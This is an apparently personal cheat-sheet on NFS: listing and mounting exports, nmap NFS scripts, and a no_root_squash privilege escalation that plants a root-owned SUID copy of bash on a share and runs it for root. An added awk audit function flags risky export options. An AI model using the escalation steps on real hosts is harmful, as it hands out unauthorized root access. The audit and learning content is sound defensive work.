Network File System (NFS)


Network File System (NFS) is a protocol allowing a computer to mount a remote folder on its local file system.

🐊️ Port: 2049 (TCP)

NFS is built on RPC, which it uses for all exchanges. It uses External Data Representation (XDR) for data serialization.

List mounts 🗺️

$ showmount -e IP
# on the server: see the configured NFS exports
$ cat /etc/exports

Mount/Unmount 🤘

The command below will mount the remote folder /share inside /tmp/share on our machine. It means that when we browse /tmp/share, we will see the files inside /share on the remote host.

# sudo apt install nfs-common
$ mkdir /tmp/share
$ sudo mount -t nfs IP:/share /tmp/share/ # [-nolock]
# there are also variants (with/without vers=2):
# sudo mount -o rw,vers=2 IP:/share /tmp/share/
# unmount
$ sudo umount /tmp/share

NFS vulnerabilities ☠️


  • It's possible to use nmap to get information about NFS shares:
$ nmap IP -p 2049 --script=nfs-ls,nfs-statfs,nfs-showmount
$ sudo nmap IP -p111,2049 -sV --script nfs*
$ sudo nmap IP -p111,2049 -sV -sC
  • When root squashing is disabled (the no_root_squash export option), a local root user is mapped to the remote root user, allowing them to create SUID files.
# on the remote host, copy bash into the share
$ cp /bin/bash /share/sbash
# on the local host,
# give the file root ownership and the SUID bit
$ sudo chown root /tmp/share/sbash
$ sudo chmod +s /tmp/share/sbash
# then, on the remote host, running the SUID file
# will run it as root
$ /share/sbash -p
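
An added example (not part of the original notes): a shell function that audits an exports file for the setting abused above, root squashing disabled via `no_root_squash`. It also goes slightly beyond the notes by flagging exports open to any host and the `insecure` option. The function names `audit_exports` and `sample_exports` and the sample file are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag export options that enable the SUID abuse described above.
# Output: SEVERITY<TAB>path<TAB>client<TAB>reason, one finding per line.

audit_exports() {
    # $1: exports(5) file to read, "-" for stdin (default: /etc/exports)
    awk '
    /\\$/ { sub(/\\$/, ""); buf = buf $0 " "; next }   # join continued lines
    { $0 = buf $0; buf = ""; sub(/#.*/, "") }           # strip comments
    NF < 2 { next }                                     # blank or no client field
    {
        path = $1
        for (i = 2; i <= NF; i++) {
            client = $i; opts = ""
            p = index($i, "(")
            if (p > 0) {                                # split client(opt,opt,...)
                client = substr($i, 1, p - 1)
                opts = substr($i, p + 1)
                sub(/\)$/, "", opts)
            }
            if (client == "") client = "*"              # bare "(opts)" applies to every host
            o = "," opts ","
            if (index(o, ",no_root_squash,"))
                print "HIGH\t" path "\t" client "\tno_root_squash: client root keeps uid 0"
            if (client == "*" && index(o, ",rw,"))
                print "HIGH\t" path "\t" client "\twritable by any host"
            else if (client == "*")
                print "MEDIUM\t" path "\t" client "\treadable by any host"
            if (index(o, ",insecure,"))
                print "MEDIUM\t" path "\t" client "\tinsecure: unprivileged source ports accepted"
        }
    }' "${1:-/etc/exports}"
}

sample_exports() {
    # Constructed sample, not taken from a real host
    cat <<'EOF'
# /etc/exports
/share       10.0.0.0/24(rw,sync,no_root_squash,no_subtree_check)
/srv/public  *(ro,sync)
/srv/backup  192.0.2.10(rw,sync,root_squash) \
             *(rw,insecure)
/srv/docs    192.0.2.0/24(ro,sync,no_subtree_check)
EOF
}

sample_exports | audit_exports -
```

On a server, run `audit_exports` with no argument to check /etc/exports; an empty result means none of these patterns were found.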

👻 To-do 👻

Stuff that I found, but never read/used yet.


  • nfs-utils (ubuntu), nfs-ganesha (solaris), openNFS (RedHat)
  • nfsstat
  • nfswatch
  • DoS
  • systemctl restart nfs-kernel-server ; exportfs

Add an export

  • echo '/tmp/share CIDR(sync,no_subtree_check)' >> /etc/exports